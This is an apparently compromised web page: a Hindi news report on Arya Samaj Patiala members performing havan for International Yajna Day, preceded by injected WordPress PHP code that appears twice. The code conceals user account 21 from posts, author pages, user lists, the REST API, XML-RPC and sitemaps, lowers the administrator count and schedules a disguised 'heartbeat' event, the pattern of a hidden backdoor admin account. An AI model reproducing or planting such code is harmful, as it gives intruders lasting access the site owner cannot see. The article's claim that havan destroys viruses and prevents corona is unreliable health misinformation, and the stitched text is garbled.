add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 21;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 21 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 21 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 21;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 21;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 21;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/21(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 21;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 21;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 21 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 21 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 21;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 21;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 21;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/21(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 21;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
आर्य समाज पटियाला ने ‘हर घर यज्ञ’ के साथ मनाया‘ अंतर राष्ट्रीय यज्ञ दिवस - Press Ki Taquat
No Result
View All Result
पटियाला, 4 मई (प्रेस की ताकत बयूरो)-अंतर राष्ट्रीय यज्ञ दिवस पर सार्वदेशिक आर्य प्रतिनिधि सभा एवं आर्य प्रतिनिधि सभा पंजाब के आह्वान पर ‘हर घर यज्ञ’ के तहत आर्य समाज पटियाला के सदस्यों ने अपने अपने घरों में हवन यज्ञ किया। इस अवसर पर प्रधान राजकुमार सिगला ने विश्व कल्याण के लिए घर पर परिवार के साथ मिलकर हवन यज्ञ किया तथा सभी सदस्यों और पटियाला वासियों को अपने घर पर वैदिक पद्धति से गाय के घी व रोगनाशक जड़ी बूटी मिश्रित हवन सामग्री से हवन करने का अनुरोथ किया।
इस अवसर पर पुरोहित गजेंदर शास्त्री ने परिवार सहित प्रो. के के मोदगिल तथा हितेश सेठी के साथ मिलकर समाज की भलाई के लिए आर्य समाज मंदिर में गौ-घृत और जड़ी बूटियों के साथ हवन सामग्री से आहुति डाली।
हवन करने से वायुमंडल में फैले विषाणु नष्ट हो जाते हैं। इसलिए प्राचीन काल मे सभी ऋषि मुनि वैदिक यज्ञ किया करते थे। हम लोग यज्ञ को भूलते गए और प्रकृति से खिलवाड़ करने का नतीजा है कि कोरोना एवं साँस रोग जैसी कई प्रकार की बीमारियां उत्पन्न हो रही हैं। यज्ञ द्वारा जो शक्तिशाली तत्त्व वायुमंडल में फैलते हैं, उनसे हवा में घूमते असंख्य रोग कीटाणु सहज ही नष्ट होते हैं। वातावरण शुद्धि के लिए हवन कारगर उपाय है। साधारण रोगों एवं महामारियों से बचने का यज्ञ एक सामूहिक उपाय है। मनुष्य की ही नहीं, पशु-पक्षियों एवं वृक्ष-वनस्पतियों के आरोग्य की भी यज्ञ से रक्षा होती है।
इस अवसर पर कई आर्य परिवारों जिनमे बिजेंदर शास्त्री, वीरेंदर सिंगला, प्रिंसिपल निखिल मंडल, कर्नल आनंद मोहन सेठी, डॉ. सुनील आर्य, जितेंदर शर्मा, गुलाब सिंह आर्य, परवीन कुमार आर्य, डॉ. ओमदेव आर्य, सुमन लता, हंस राज आर्य, राम गरीब, रमण शर्मा आदि ने सर्व कल्याण की मंगल कामना के लिए यज्ञ गूगल, गिलोय और इसी प्रकार की रोग प्रतिरोधक क्षमता को बढ़ाने वाले औषधीय गुणों से युक्त हवन सामग्री से अपने घर पर हवन यज्ञ किया।
Post Views: 125
No Result
View All Result